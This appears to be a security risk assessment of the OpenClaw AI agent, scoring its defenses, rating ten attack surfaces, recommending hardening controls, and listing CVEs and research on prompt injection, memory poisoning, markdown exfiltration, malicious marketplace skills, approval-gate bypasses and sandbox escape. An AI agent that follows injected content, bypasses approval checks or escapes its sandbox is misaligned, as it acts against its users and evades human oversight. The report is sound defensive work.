1 Risk Scores
Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.
Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.
Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.
Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.
Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.
Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.
2 Defense Components
Five MECE categories (Input → Processing → Action → Output → Detection) each scored 0–3. OpenClaw scores zero across all five.
Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.
Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.
Action Controls: 0 / 3. Tool calls execute without approval gates or permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.
Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.
Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.
3 Attack Surface Exposure
Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; six are at the architectural maximum.
User Input: 4 / 4. Direct prompt injection is trivially effective. No input validation, no separation between the user's intent and adversarial content.
External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.
Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.
Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.
Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.
Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.
Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.
Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.
Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.
Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.
4 Detailed Assessment
Agent properties mapped against best-in-class reference agents from the same cohort.
| Dimension | OpenClaw | Best-in-class reference |
|---|---|---|
| Untrusted input surfaces | Web, email, messages, files, 20+ messaging platforms, browser, shell, marketplace skills | Code-completion tools with no web or messaging ingress |
| Tool capabilities | Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills | Scoped tool access with explicit capability declarations |
| Human-in-the-loop | None; fully autonomous 24/7 daemon | Claude Code: 3-level permission model with deny accumulation |
| Sandboxing & isolation | None; 30K+ exposed instances; no network isolation; no file scoping; no credential management | Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked. |
| Known CVEs & incidents | 10+ CVEs; 820 malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed | Cohort agents with zero published CVEs and independent adversarial testing |
| Compliance posture | None | Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001) |
Lethal Trifecta
Yes — all threeThe Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: ingests untrusted content from web, email, and marketplace skills; accesses user files, credentials, and messaging platforms; and can send outbound traffic without restriction.
5 Hardening Recommendations
If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None restores the agent to acceptable risk; they reduce blast radius.
Input (Input Guardrails)
- Disable the skills marketplace entirely; allowlist only internally audited skills. Treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
- Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.
Isolation (Execution Isolation)
- Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
- Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
- Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.
Action (Action Controls)
- Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.
Output (Output Guardrails)
- Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. Closes the primary documented exfiltration channels.
Detection (Monitoring & Audit)
- Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.
Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.
6 Threat Intelligence
Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.
CVEs and Advisories
- CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
- CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
- CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
- CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
- CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
- jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.
Published Research
- The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the zero-click attack chain from crafted webpage to full shell access.
- Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
- CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
- Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
- Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
- Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
- Wiz / ARMO — Analysis of sandbox escape via
sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation. - ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.